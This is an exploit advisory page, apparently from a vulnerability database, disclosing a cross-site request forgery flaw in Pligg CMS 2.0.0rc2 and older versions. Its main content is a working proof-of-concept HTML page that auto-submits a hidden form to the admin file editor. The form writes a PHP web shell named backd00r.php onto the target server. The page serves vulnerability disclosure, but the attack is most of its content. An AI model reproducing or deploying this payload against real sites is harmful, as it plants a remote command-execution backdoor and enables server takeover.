Pligg CMS - CSRF Vulnerability

2013-08-15 / 2013-08-16
Credit: DaOne
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

--------------------------------------------------- # Exploit Title: Pligg CMS - CSRF Vulnerability # Author: DaOne # Vendor Homepage: http://pligg.com/ # Download link: https://github.com/Pligg/pligg-cms/archive/2.0.0rc2.zip # Category: webapps/php # Version: 2.0.0rc2 + old versions --------------------------------------------------- -Create File by CSRF Exploit- <html> <body onload="document.form.submit();"> <form action="http://[target]/pligg/admin/admin_editor.php" method="post" name="form"> <input type="hidden" name="updatedfile" value="<?php system($_REQUEST['cmd']); ?>"> <input type="hidden" name="the_file2" value="/var/www/html/pligg/backd00r.php"> <input type="hidden" name="isempty" value="1"> <input type="hidden" name="save" value="Save+Changes"> </form> </body> </html>

References:

https://github.com/Pligg/pligg-cms/archive/2.0.0rc2.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top